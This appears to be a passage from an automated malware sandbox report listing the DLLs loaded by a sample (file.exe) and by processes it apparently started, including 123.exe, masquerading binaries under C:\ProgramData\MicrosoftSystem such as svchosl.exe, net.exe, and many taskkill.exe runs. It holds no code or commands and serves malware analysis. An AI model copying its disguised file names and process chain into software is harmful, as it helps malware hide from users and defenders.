Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mscoree.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: vcruntime140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ucrtbase_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: amsi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: gpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dwrite.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msvcp140_clr0400.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wbemcomn.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: <pi-ms-win-core-synch-l1-2-0.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: <pi-ms-win-core-fibers-l1-1-1.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: <pi-ms-win-core-localization-l1-2-1.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: dxgidebug.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: dwmapi.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: pcacli.dll Jump to behavior
Source: C:\Users\123.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\timeout.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\Wmiic.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: version.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: cryptsp.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: rsaenh.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: libffi-7.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: libcrypto-1_1.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: libssl-1_1.dll Jump to behavior
Source: C:\ProgramData\MicrosoftSystem\svchosl.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: samcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: dsrole.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: logoncli.dll Jump to behavior
Source: C:\Windows\SysWOW64\net1.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanagersvc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: licensemanager.dll
Source: C:\Windows\System32\svchost.exe Section loaded: clipc.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe Section loaded: wldp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: dbghelp.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: netutils.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: winsta.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: amsi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: userenv.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: profapi.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: version.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: mpr.dll
Source: C:\Windows\System32\taskkill.exe Section loaded: framedynos.dll
